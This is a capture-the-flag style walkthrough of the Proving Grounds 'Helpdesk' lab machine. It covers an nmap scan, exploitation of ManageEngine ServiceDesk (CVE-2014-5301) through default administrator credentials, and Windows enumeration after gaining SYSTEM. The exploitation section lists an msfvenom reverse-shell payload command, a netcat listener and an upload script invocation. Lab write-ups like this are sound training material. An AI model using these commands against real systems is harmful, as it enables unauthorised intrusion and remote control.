Proving Grounds | Helpdesk

Proving Grounds | Helpdesk

9 months ago   •   5 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.92 scan initiated Wed Aug 31 23:42:57 2022 as: nmap -T5 -p135,139,445,3389,8080 -A -oA scan-all -Pn
Nmap scan report for
Host is up (0.083s latency).

135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: ManageEngine ServiceDesk Plus
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
|_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: HELPDESK
|   NetBIOS computer name: HELPDESK\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-08-31T20:43:15-07:00
|_nbstat: NetBIOS name: HELPDESK, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ba:ae:6a (VMware)
| smb2-time: 
|   date: 2022-09-01T03:43:15
|_  start_date: 2022-08-02T03:40:42
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.0.2: 
|_    Message signing enabled but not required

TRACEROUTE (using port 135/tcp)
1   83.55 ms
2   83.78 ms

OS and Service detection performed. Please report any incorrect results at .
# Nmap done at Wed Aug 31 23:43:55 2022 -- 1 IP address (1 host up) scanned in 58.19 seconds

Service Enumeration


The nmap NSE scripts were able to enumerate some information about the target.

Test for anonymous SMB share listing.


Looking at my notes, I already have an entry for this service and version number. Looks like this version of ManageEngine ServiceDesk โ€“ 7.6.0 โ€“ is vulnerable to authenticated file upload and path traversal โ€“ CVE-2014-5301 .

Based on my notes, the service may be configured with the default credentials: administrator:administrator . Let's give it a test run.

We should be able to use this exploit here to upload a Java reverse shell to the target.

exploits/ at master ยท PeterSufliarsky/exploits
Some of the exploits, which I used for learning. Contribute to PeterSufliarsky/exploits development by creating an account on GitHub.



This version of ManageEngine ServiceDesk is vulnerable to an authenticated file upload vulnerability. Additionally, the service was configured with very weak credentials of administrator:administrator , which required a simple guess and no brute-forcing.

Authenticated File Upload

The order of operations to exploit the target should be:

  1. Create a msfvenom payload
  2. Start a listener
  3. Execute the script to load the reverse shell on the target

After trying several ports, I was finally able to get a reverse shell with TCP/445 .

msfvenom -p java/shell_reverse_tcp LHOST= LPORT=445 -f war -o pwnz.war
sudo rlwrap nc -lnvp 4445
python3 ./ 8080 administrator administrator pwnz.war

Post-Exploit Enumeration

Current User

Click to expand

User Name           SID     
=================== ========
nt authority\system S-1-5-18

OS & Kernel

Click to expand
Host Name:                 HELPDESK
OS Name:                   Microsoftr Windows Serverr 2008 Standard 
OS Version:                6.0.6001 Service Pack 1 Build 6001
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                92573-OEM-7502905-27565
Original Install Date:     12/19/2009, 11:25:57 AM
System Boot Time:          8/31/2022, 8:40:34 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,502 MB
Page File: Max Size:       1,983 MB
Page File: Available:      1,450 MB
Page File: In Use:         533 MB
Page File Location(s):     N/A
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [02]: fe80::5df2:b89c:1eb9:8e78


Click to expand
User accounts for \\

Administrator            Guest


Click to expand
Unable to enumerate to do login shell as system.


Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::5df2:b89c:1eb9:8e78%11
   IPv4 Address. . . . . . . . . . . :
   Subnet Mask . . . . . . . . . . . :
   Default Gateway . . . . . . . . . :

Tunnel adapter Local Area Connection*:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

ARP Table


Open Ports

Ping Sweep


Click to expand


Click to expand

Scheduled Tasks

Click to expand

Privilege Escalation

The vulnerable service is running as NT AUTHORITY\SYSTEM . Therefore, all command execution via the service will be done at the highest integrity level.



Spread the word

Keep reading